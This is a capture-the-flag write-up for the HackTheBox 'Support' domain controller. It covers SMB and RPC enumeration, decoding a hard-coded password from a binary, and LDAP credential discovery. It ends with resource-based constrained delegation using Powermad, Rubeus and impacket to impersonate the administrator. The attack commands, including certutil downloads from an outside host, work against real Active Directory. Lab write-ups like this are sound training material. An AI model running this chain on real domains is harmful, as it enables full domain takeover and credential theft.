Support from HackTheBox

While it presents some challenges, it is a valuable learning experience. Through working on this machine, I gained valuable knowledge on enumerating domain controllers, which helped me excel in future challenges and exams.

by Johann Van Niekerk

Support from HackTheBox

Share

Nmap Scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-08 11:08:31Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Support is a HackTheBox machine that is rated easy.

HackTheBox's Support machine is rated as easy by the platform, but considered medium difficulty by the community. While it presents some challenges, it is a valuable learning experience. Through working on this machine, I gained valuable knowledge on enumerating domain controllers, which helped me excel in future challenges and exams.

Initial Access - Decoded Credentials

Initial enumeration on the machine begins with looking at the likely ports that may contain information. We uncover that the machine we are targeting is a domain controller due to several open ports that hint towards this such as port 53, 88, 389 and so forth.

First steps begins with SMB and we attempt various methods of authentication however our first attempt at anonymous login reveals that there is a readable share "support-tools"

cme smb 10.10.11.174 -u 'a' -p '' --shares

Using smbclient we can authenticate and access the share-folder without credentials.

smbclient //10.10.11.174/support-tools
nopass

Using this smb connection, we pull an interesting file "UserInfo.exe.zip" to inspect closer. When unzipping the file it just results in an executable file and we can attempt to see if there is any leakage with information using the "strings" binary.

# Unzip
unzip UserInfo.exe.zip

# Strings
strings UserInfo.exe

Unfortunately this doesn't uncover any additional info and may require a closer look with tools on a windows VM. For now we proceed with the remaining ports and see what further information we can pull.

Next we tackle port 135 and see if there is any anonymous login and ability to query the domain controller.

rpcclient -U"" 10.10.11.174

With it connecting successfully; we proceed to send some queries and find any formation that we can get. The following produces a rough idea of different SID values by incrementing by common values.

Usually administrator groups are in the 500 range and users are typically in the 1000 range.

lsaenumsid
lookupsids S-1-5-32-544

Our original query returned with a valid user SID for the domain but without the user identification value so this part took some guess work

# Domain SID
lookupsids S-1-5-21-1677581083-3380853377-188903654

# Enumerate users
lookupsids S-1-5-21-1677581083-3380853377-188903654-500
lookupsids S-1-5-21-1677581083-3380853377-188903654-1000
lookupsids S-1-5-21-1677581083-3380853377-188903654-1001
...

From this we discover some usernames for our collection and may prove useful or could be useless.

# Users Found
S-1-5-21-1677581083-3380853377-188903654-1106 SUPPORT\smith.rosario (1)
S-1-5-21-1677581083-3380853377-188903654-1107 SUPPORT\hernandez.stanley (1)
S-1-5-21-1677581083-3380853377-188903654-1108 SUPPORT\wilson.shelby (1)
S-1-5-21-1677581083-3380853377-188903654-1109 SUPPORT\anderson.damian (1)
S-1-5-21-1677581083-3380853377-188903654-1110 SUPPORT\thomas.raphael (1)
S-1-5-21-1677581083-3380853377-188903654-1111 SUPPORT\levine.leopoldo (1)
S-1-5-21-1677581083-3380853377-188903654-1112 SUPPORT\raven.clifton (1)
S-1-5-21-1677581083-3380853377-188903654-1113 SUPPORT\bardot.mary (1)
S-1-5-21-1677581083-3380853377-188903654-1114 SUPPORT\cromwell.gerard (1)
S-1-5-21-1677581083-3380853377-188903654-1115 SUPPORT\monroe.david (1)
S-1-5-21-1677581083-3380853377-188903654-1116 SUPPORT\west.laura (1)
S-1-5-21-1677581083-3380853377-188903654-1117 SUPPORT\langley.lucy (1)
S-1-5-21-1677581083-3380853377-188903654-1118 SUPPORT\daughtler.mabel (1)
S-1-5-21-1677581083-3380853377-188903654-1119 SUPPORT\stoll.rachelle (1)
S-1-5-21-1677581083-3380853377-188903654-1120 SUPPORT\ford.victoria (1)

After collecting all the usernames and attempting further port probing; we decide to move over the "UserInfo.exe" over to a windows machine and using the following to decode the executable.

ILSpy

Using it with Visual Studio, we run the UserInfo.exe and discover interesting information within the UserInfo.Services function. We discover a key value "armando" and the encoded password along with some code that appears to be able to produce the de-encoded password.

We convert the code to a python variant and running the following python code completes the query and prints it out for us.

#!/usr/bin/python3
import base64
enc_pass="0Nv32PT.............truncated............193E"
key=b"a....truncated....o"

array=base64.b64decode(enc_pass)
array2=[]

for i in range(len(array)):
    array2.append(chr(array[i] ^ key[i % len(key)] ^ 223))

print(''.join(array2))
# Decoded Password
nvEf................truncated...............1%lmz

Looking further into the executable functions, we also see that there is a user "ldap" under the LdapQuery class. This hints at what our next step would be to further enumerate.

Using LDAPSEARCH

With our credentials and some indication of a username, we can query LDAP with our new information from our credential and the LDAP user.

ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK1.................truncated.....................PWO1%lmz' -b "CN=Users,DC=support,DC=htb"

From this we uncover some leftover information that looks like a password for another user called Support.

support:I................truncated...........ful

We check our information with CME and can see that the login is successful.

Using LDAPDOMAINDUMP

Similarly, we could also use ldapdomaindump to complete remote domain queries and provide the files locally for Blood-Hound. This productes the same information as before including the comment that has the credentials.

ldapdomaindump support.htb -u 'support\ldap' -p 'nvE...............truncated.............%lmz' --no-json --no-grep

Initial Access

After testing our credentials with CME, we can connect through winrm using a tool "evil-winrm"

evil-winrm -u 'support' -p 'I...........truncated...............ful' -i 10.10.11.174

Using Bloodhound-python

Gathering information for Bloodhound

bloodhound-python -u ldap -d support.htb -p 'nvE...........truncated...............O1%lmz' --dns-tcp -ns 10.10.11.174 -c all --zip

Privilege Escalation - Computer Object Takeover/Impersonate

Using Blood-Hound and through checking all the information available, we discover that the Support user has GenericAll privileges on the DC.

This can lead to a misconfiguration whereby our user can lead to and perform Computer Object Takeover.

Found Computer Object Takeover

First we proceed to download a script that will allow us to create a new computer object. This will be trusted by our victim computer later on.

# Download & Transfer to Victim
wget https://github.com/Kevin-Robertson/Powermad/raw/master/Powermad.ps1

certutil -f -urlcache http://10.10.14.34/Powermad.ps1 powermad.ps1

We transfer the script over and execute the following:

New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

Checking if the computer got created and noting its SID using "Powerview.ps1":

# Transfer PowerView.ps1 over
certutil -f -urlcache http://10.10.14.34/PowerView.ps1 powerview.ps1

# Run
Get-DomainComputer fake01

Taking note of the SID we created:

S-1-5-21-1677581083-3380853377-188903654-5102

Next we create a new raw security descriptor for the FAKE01 computer principal:

# Adjust SID to the one we received for FAKE01
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5102)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Using the computer name:

Get-NetComputer dc | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
Get-DomainComputer dc| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity'

Next we need to use Rubeus in order to get the RC4 hash.

Rubeus

We transfer over rubeus and run on the victim machine.

./rubeus.exe hash /password:123456 /user:fake01 /domain:support.htb

With rubeus, we generated the RC4 Hash:

rc4:32ED87BDB5FDC5E9CBA88547376818D4

Using this hash, we are able to request a kerberos ticket for our computer object with the ability to impersonate the specific user: "administrator".

./rubeus.exe s4u /user:fake01$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt

Next we convert the base64 blob and ticket to a CCACHE that is useable with Linux environment variables allowing us to use impacket tools.

Convert the BASE64 blob and ticket to a CCACHE file usable with impacket.

We save the content as administrator.ccache and export it as an environment variable:

 export KRB5CCNAME=administrator.ccache

Then using PSEXEC to connect to the target as administrator.

impacket-psexec support.htb/administrator@dc.support.htb -no-pass -k

(Alternative) Impacket-getST

Alternatively we can use an impacket tool "impacket-getST" to complete the same request as Rubeus and obtain/directly save into a CCACHE that we can use with environment variables:

impacket-getST support.htb/fake01 -dc-ip dc.support.htb -impersonate administrator -spn www/dc.support.htb

We save the content as administrator.ccache and export it as an environment variable:

 export KRB5CCNAME=administrator.ccache

Then using PSEXEC to connect to the target as administrator.

impacket-psexec support.htb/administrator@dc.support.htb -no-pass -k